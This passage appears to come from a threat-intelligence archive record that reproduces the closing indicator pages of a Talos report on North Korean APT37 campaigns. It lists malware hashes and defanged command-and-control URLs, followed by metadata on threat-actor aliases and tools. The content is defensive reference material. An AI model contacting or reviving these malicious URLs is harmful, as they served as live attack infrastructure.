#1: 761454dafba7e191587735c0dc5c6c8ab5b1fb87a0fa44bd046e8495a27850c7\r\nUnpacked #1: 3d442c4457cf921b7a335c0d7276bea9472976dc31af94ea0e604e466596b4e8\r\nUnpacked #1: 930fce7272ede29833abbfb5df4e32eee9f15443542434d7a8363f7a7b2d1f00\r\nUnpacked #1: 4b20883386665bd205ac50f34f7b6293747fd720d602e2bb3c270837a21291b4\r\nUnpacked #1: f080f019073654acbe6b7ab735d3fd21f8942352895890d7e8b27fa488887d08\r\nNetwork:\r\n- www[.]imuz[.]com/admin/data/bbs/review2/board/index.php\r\n- www[.]imuz[.]com/admin/data/bbs/review2/board/123.php\r\n- www[.]imuz[.]com/admin/data/bbs/review2/board/02BC6B26_put.jpg (where 02BC6B26 is randomly\r\ngenerated)\r\n- www[.]wildrush[.]co[.]kr/bbs/data/image/work/webproxy.php\r\n- www[.]wildrush[.]co[.]kr/bbs/data/image/work/02BC6B26_put.jpg (where 02BC6B26 is randomly generated)\r\n- www[.]belasting-telefoon[.]nl//images/banners/temp/index.php\r\n- www[.]belasting-telefoon[.]nl//images/banners/temp/02BC6B26_put.jpg (where 02BC6B26 is randomly\r\ngenerated)\r\n- www[.]kgls[.]or[.]kr/news2/news_dir/index.php\r\n- www[.]kgls[.]or[.]kr/news2/news_dir/02BC6B26_put.jpg (where 02BC6B26 is randomly generated)\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 28 of 29\n\n\"Are You Happy?\" Campaign:\r\nWiper sha256: 6332c97c76d2da7101ad05f501dc1188ac22ce29e91dab6d0c034c4a90b615bd\r\n\"FreeMilk\" Campaign:\r\nOffice sha256: f1419cde4dd4e1785d6ec6d33afb413e938f6aece2e8d55cf6328a9d2ac3c2d0\r\nHTA sha256: a585849d02c94e93022c5257b162f74c0cdf6144ad82dd7cf7ac700cbfedd84f\r\nJS sha256: 1893af524edea4541c317df288adbf17ae4fcc3a30d403331eae541281c71a3c\r\nPoohMilk sha256: 35273d6c25665a19ac14d469e1436223202be655ee19b5b247cb1afef626c9f2\r\nFreenki sha256: 7f35521cdbaa4e86143656ff9c52cef8d1e5e5f8245860c205364138f82c54df\r\nFreenki 2016: 99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5\r\nNetwork:\r\n- hxxp://old[.]jrchina[.]com/btob_asiana/udel_calcel.php?fdid=[base64_data]\r\n- hxxp://old[.]jrchina[.]com/btob_asiana/appach01.jpg\r\n- hxxp://old[.]jrchina[.]com/btob_asiana/appach02.jpg\r\n- hxxp://old[.]jrchina[.]com/btob_asiana/udel_ok.ipp\r\n- hxxp://old[.]jrchina[.]com/btob_asiana/udel_confirm.php\r\n\"North Korean Human Rights\" Campaign:\r\nMaldoc sha256: 171e26822421f7ed2e34cc092eaeba8a504b5d576c7fd54aa6975c2e2db0f824\r\nDropper #1: a29b07a6fe5d7ce3147dd7ef1d7d18df16e347f37282c43139d53cce25ae7037\r\nDropper #2: eb6d25e08b2b32a736b57f8df22db6d03dc82f16da554f4e8bb67120eacb1d14\r\nDropper #3: 9b383ebc1c592d5556fec9d513223d4f99a5061591671db560faf742dd68493f\r\nROKRAT:: b3de3f9309b2f320738772353eb724a0782a1fc2c912483c036c303389307e2e\r\n\"Evil New Year 2018\" Campaign:\r\nMaldoc sha256: f068196d2c492b49e4aae4312c140e9a6c8c61a33f61ea35d74f4a26ef263ead\r\nPNG : bdd48dbed10f74f234ed38908756b5c3ae3c79d014ecf991e31b36d957d9c950\r\nROKRAT:: 3f7827bf26150ec26c61d8dbf43cdb8824e320298e7b362d79d7225ab3d655b1\r\nNetwork:\r\n- hxxp://60chicken[.]co[.]kr/wysiwyg/PEG_temp/logo1.png\r\nReferences\r\n/korean-maldoc\r\n/introducing-rokrat\r\n/ROKRAT-Reloaded\r\nSource: http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 29 of 29", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "ETDA", "Malpedia" ], "references": [ "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" ], "report_names": [ "korea-in-crosshairs.html" ], "threat_actors": [ { "id": "08c8f238-1df5-4e75-b4d8-276ebead502d", "created_at": "2023-01-06T13:46:39.344081Z", "updated_at": "2026-04-10T02:00:03.294222Z", "deleted_at": null, "main_name": "Copy-Paste", "aliases": [], "source_name": "MISPGALAXY:Copy-Paste", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e", "created_at": "2025-08-07T02:03:25.082908Z", "updated_at": "2026-04-10T02:00:03.744649Z", "deleted_at": null, "main_name": "NICKEL FOXCROFT", "aliases": [ "APT37 ", "ATK4 ", "Group 123 ", "InkySquid ", "Moldy Pisces ", "Operation Daybreak ", "Operaton Erebus ", "RICOCHET CHOLLIMA ", "Reaper ", "ScarCruft ", "TA-RedAnt ", "Venus 121 " ], "source_name": "Secureworks:NICKEL FOXCROFT", "tools": [ "Bluelight", "Chinotto", "GOLDBACKDOOR", "KevDroid", "KoSpy", "PoorWeb", "ROKRAT", "final1stpy" ], "source_id": "Secureworks", "reports": null }, { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "bbe36874-34b7-4bfb-b38b-84a00b07042e", "created_at": "2022-10-25T15:50:23.375277Z", "updated_at": "2026-04-10T02:00:05.327922Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "APT37", "InkySquid", "ScarCruft", "Group123", "TEMP.Reaper", "Ricochet Chollima" ], "source_name": "MITRE:APT37", "tools": [ "BLUELIGHT", "CORALDECK", "KARAE", "SLOWDRIFT", "ROKRAT", "SHUTTERSPEED", "POORAIM", "HAPPYWORK", "Final1stspy", "Cobalt Strike", "NavRAT", "DOGCALL", "WINERACK" ], "source_id": "MITRE", "reports": null }, { "id": "552ff939-52c3-421b-b6c9-749cbc21a794", "created_at": "2023-01-06T13:46:38.742547Z", "updated_at": "2026-04-10T02:00:03.08515Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "Operation Daybreak", "Red Eyes", "ScarCruft", "G0067", "Group123", "Reaper Group", "Ricochet Chollima", "ATK4", "APT 37", "Operation Erebus", "Moldy Pisces", "APT-C-28", "Group 123", "InkySquid", "Venus 121" ], "source_name": "MISPGALAXY:APT37", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9b02c527-5077-489e-9a80-5d88947fddab", "created_at": "2022-10-25T16:07:24.103499Z", "updated_at": "2026-04-10T02:00:04.867181Z", "deleted_at": null, "main_name": "Reaper", "aliases": [ "APT 37", "ATK 4", "Cerium", "Crooked Pisces", "G0067", "Geumseong121", "Group 123", "ITG10", "InkySquid", "Moldy Pisces", "Opal Sleet", "Operation Are You Happy?", "Operation Battle Cruiser", "Operation Black Banner", "Operation Daybreak", "Operation Dragon messenger", "Operation Erebus", "Operation Evil New Year", "Operation Evil New Year 2018", "Operation Fractured Block", "Operation Fractured Statue", "Operation FreeMilk", "Operation Golden Bird", "Operation Golden Time", "Operation High Expert", "Operation Holiday Wiper", "Operation Korean Sword", "Operation North Korean Human Right", "Operation Onezero", "Operation Rocket Man", "Operation SHROUDED#SLEEP", "Operation STARK#MULE", "Operation STIFF#BIZON", "Operation Spy Cloud", "Operation Star Cruiser", "Operation ToyBox Story", "Osmium", "Red Eyes", "Ricochet Chollima", "Ruby Sleet", "ScarCruft", "TA-RedAnt", "TEMP.Reaper", "Venus 121" ], "source_name": "ETDA:Reaper", "tools": [ "Agentemis", "BLUELIGHT", "Backdoor.APT.POORAIM", "CARROTBALL", "CARROTBAT", "CORALDECK", "Cobalt Strike", "CobaltStrike", "DOGCALL", "Erebus", "Exploit.APT.RICECURRY", "Final1stSpy", "Freenki Loader", "GELCAPSULE", "GOLDBACKDOOR", "GreezeBackdoor", "HAPPYWORK", "JinhoSpy", "KARAE", "KevDroid", "Konni", "MILKDROP", "N1stAgent", "NavRAT", "Nokki", "Oceansalt", "POORAIM", "PoohMilk", "PoohMilk Loader", "RICECURRY", "RUHAPPY", "RokRAT", "SHUTTERSPEED", "SLOWDRIFT", "SOUNDWAVE", "SYSCON", "Sanny", "ScarCruft", "StarCruft", "Syscon", "VeilShell", "WINERACK", "ZUMKONG", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434720, "ts_updated_at": 1775792286, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/7da818fc54818da4536f98203ef35f39940ca222.pdf", "text": "https://archive.orkl.eu/7da818fc54818da4536f98203ef35f39940ca222.txt", "img": "https://archive.orkl.eu/7da818fc54818da4536f98203ef35f39940ca222.jpg" } }